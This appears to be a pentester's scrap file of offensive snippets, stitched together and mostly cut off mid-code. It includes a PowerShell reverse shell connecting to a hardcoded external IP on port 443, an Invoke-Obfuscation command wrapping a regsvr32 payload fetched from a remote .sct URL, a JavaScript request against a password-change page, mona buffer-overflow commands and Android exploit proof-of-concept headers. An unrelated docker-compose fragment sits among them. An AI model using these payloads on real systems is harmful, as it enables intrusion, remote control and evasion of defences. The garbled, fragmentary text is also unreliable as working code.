"@
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
public static class GetAddress
{
    [DllImport("kernel32", SetLastError=true, CharSet = CharSet.Ansi)]

1. Macro Web_Delivery + Invoke-Obfuscation
Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {WEBDELIVERY_PAYLOAD} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'
e.g
import-module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {regsvr32 /s /n /u /i:http://IP:8080/37yWWx.sct scrobj.dll} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'

var x = new XMLHttpRequest();
var r=0;
x.open('GET','https:/XXXXXXX/AgirhNet/StaticWebForm/Outils/ChangePwd.aspx');
x.responseType = "document";
x.send(null);
x.onreadystatechange = function() {
    if (x.readyState === 4 && r != 1) {

alert(1)

$socket = new-object System.Net.Sockets.TcpClient('37.187.112.19', 443);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
    $writer.Flush();
    $read = $null;

---
version: '3.7'
services:
  nginx:
    build:
      context: ./
      dockerfile: Dockerfile.nginx
    image: defectdojo/defectdojo-nginx:${NGINX_VERSION:-latest}
    depends_on:
      - uwsgi

Mona tricks:
---------------
!mona pc 1000 -> Launch exploit with pattern
!mona findmsp -> autocalculate offset, ESP size.....
No jmp esp in Exec Region (.text) but no DEP:
!mona asm -s "jmp esp"
!mona find -s "\xff\xe4" -m <module>
-----------------

<html>
<a href="william://www.hackplayers.com">MEOW</a>
</html>

package com.adon.exploitcors;
import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
import android.os.Bundle;
import android.widget.Toast;
public class MainActivity extends AppCompatActivity {

package com.example.intentpoc;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
public class MainActivity extends AppCompatActivity {